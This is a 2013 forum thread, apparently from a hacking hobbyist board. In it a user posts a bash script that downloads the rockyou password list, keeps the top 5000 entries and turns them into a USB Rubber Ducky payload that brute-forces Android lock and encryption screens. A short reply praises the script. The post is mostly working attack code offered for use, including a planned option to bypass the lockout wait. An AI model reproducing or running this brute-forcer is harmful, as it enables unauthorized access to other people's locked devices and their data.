CaptainHooligan Posted February 6, 2013 Share Posted February 6, 2013 Another good thing to do would be to download the rockyou password listfrom skullsecurity. Take like the top 5000 out of it as it is alreadysorted by most frequently used to least. If a device is encrypted thiswill save you tons of time as there is no 5 password then wait limiter.Hereis a script that will grab rockyou.txt and create a payload for you inlinux. Right now it does wait 30 seconds after every 5 passwords. I'madding an option to not wait 30 seconds as if attacking the encryptionlogon screen. #!/bin/bash clear echo -e "========================================================" echo -e " This script downloads the rockyou password list" echo -e " then takes the top 5000 passwords and generates" echo -e " an Android brute forcer." echo -e "========================================================" echo -e " You need to have duckencode.jar installed as well" echo -e " as bzip2 and wget." echo -e "========================================================" echo -e " This script is licensed under the GPLv3 and is" echo -e " currently maintained by James Luther (CaptainHooligan)" echo -e "========================================================" echo "" echo "" WHOAMI=`id | sed -e 's/(.*//'` if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1 fi echo -e "Verifying prerequisites are installed ... " echo "" duckdir=`find / -name duckencode.jar` if [ -z "$duckdir" ] ; then echo "Duckencode.jar not found on system. Please verify you have this installed." exit 1 else echo "Duckencode.jar prerequisite met." fi duckinpath=`which duckencode.jar` if [ -z "$duckinpath" ] ; then PATH=$PATH:$duckdir fi bundir=`find / -name bzip2` if [ -z "$bundir" ] ; then echo "Bzip2 not found on system. Please verify you have this installed." exit 1 else echo "Bzip2 prerequisite met." fi buninpath=`which bzip2` if [ -z "$buninpath" ] ; then PATH=$PATH:$bundir fi wgetdir=`find / -name wget` if [ -z "$wgetdir" ] ; then echo "Wget not found on system. Please verify you have this installed." exit 1 else echo "Wget prerequisite met." fi wgetinpath=`which wget` if [ -z "$wgetinpath" ] ; then PATH=$PATH:$wgetdir fi echo "" echo "" #echo -e "Which do you want to attack?" #echo -e " 1. Encryption Screen" #echo -e " 2. Password Screen" #read answer #case answer # 1) echo -e "Verify connection to internet and press [Enter]." read echo "" echo "" echo -e "Downloading rockyou password list. This can take some time ..." echo "" echo "" wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bunzip rockyou.txt.bz2 echo "" echo "" echo -e "Creating rock-android.txt file ... " echo "" echo "" echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt echo -e "rock-android.txt created!" ls -lart rock-android.txt echo "" echo "" echo -e "Creating inject.bin file ... " java -jar duckencode.jar -i rock-android.txt echo "" echo "" echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!" ls -lart inject.bin Quote Link to comment Share on other sites More sharing options...
gazzdingo Posted February 7, 2013 Share Posted February 7, 2013 nice work love it :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.